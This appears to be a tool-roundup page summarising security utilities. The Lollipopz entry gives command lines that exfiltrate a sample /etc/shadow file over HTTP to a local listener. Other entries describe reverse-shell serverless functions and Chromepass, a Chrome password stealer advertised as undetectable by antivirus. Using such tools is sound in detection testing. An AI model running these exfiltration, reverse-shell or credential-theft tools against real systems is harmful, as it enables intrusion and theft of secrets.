Lollipopz : Data Exfiltration Utility For Testing Detection Capabilities
Lollipopz is a data exfiltration utility for testing detection capabilities. Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To? /etc/shadow -> HTTP GET requests: Server: # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log; Client: $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r. /etc/shadow -> HTTP POST requests: Server: # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80...
Sherloq : An Open-Source Digital Image Forensic Toolset
Sherloq is a personal research project about implementing a fully integrated environment for digital image forensics. It is not meant as an automatic tool that decides if an image is forged or not (that tool probably will never exist...), but as a companion in putting to work various algorithms to discover potential image inconsistencies. While many commercial solutions have unaffordable...
Privacy Badger : A Browser Extension Automatically Learns To Block Invisible Trackers
Privacy Badger is a browser extension that automatically learns to block invisible trackers. Instead of keeping lists of what to block, Privacy Badger learns by watching which domains appear to be tracking you as you browse the Web. It sends the Do Not Track signal with your browsing. If trackers ignore your wishes, your Badger will learn to block them....
Audix : A PowerShell Tool To Quickly Configure Windows Event
Audix is a PowerShell tool to quickly configure the Windows Event Audit Policies for security monitoring. Note: This tool will only change the local security policy. If applied to a host with a GPO setting, it is best to use the same settings in a Group Policy default profile so all systems get the same config. If the GPO profile...
Serverless-Prey : Serverless Functions For Establishing Reverse Shells
Serverless-Prey is a collection of serverless functions (FaaS) that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container: Panther: AWS Lambda written in Node.js; Cougar: Azure Function written in C#; Cheetah: Google Cloud Function written in Go. This repository also contains research performed using these functions, including documentation on where secrets...
Lunar : A Lightweight Native DLL Mapping Library
Lunar is a lightweight native DLL mapping library that supports mapping directly from memory. Features: imports and delay imports are resolved; relocations are performed; image sections are mapped with the correct page protection; exception handlers are initialised; a security cookie is generated and initialised; DLL entry point and TLS callbacks are called. Getting Started: The example below demonstrates a simple implementation of the library: var libraryMapper = new LibraryMapper(process,...
Ps-Tools : An Advanced Process Monitoring Toolkit For Offensive Operations
Ps-Tools is an advanced process monitoring toolkit for offensive operations. Having a good technical understanding of the systems we land on during an engagement is a key condition for deciding what is going to be the next step within an operation. Collecting and analyzing data of running processes from compromised systems gives us a wealth of information and helps...
Eavesarp : Analyze ARP Requests To Identify Intercommunicating Hosts
Eavesarp is a reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution. Requirements/Installation: This is only gon' work on Kali or other Debian-based Linux distributions. eavesarp requires Python3.7 and Scapy. After installing Python, run the following to install Scapy: python3.7 -m...
Richkit : Domain Enrichment Toolkit
Richkit is a python3 package that provides tools that take a domain name as input and return additional information on that domain. It can be an analysis of the domain itself, looked up from databases, retrieved from other services, or some combination thereof. The purpose of richkit is to provide a reusable library of domain name-related analysis, lookups, and retrieval functions,...
Chromepass : Hacking Chrome Saved Passwords
Chromepass is a python-based console application that generates a Windows executable with the following features: Decrypt Chrome saved passwords; Send a file with the login/password combinations remotely (email or reverse-http); Custom icon; Completely undetectable by AntiVirus Engines. AV Detection: Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites: VirusTotal Scan...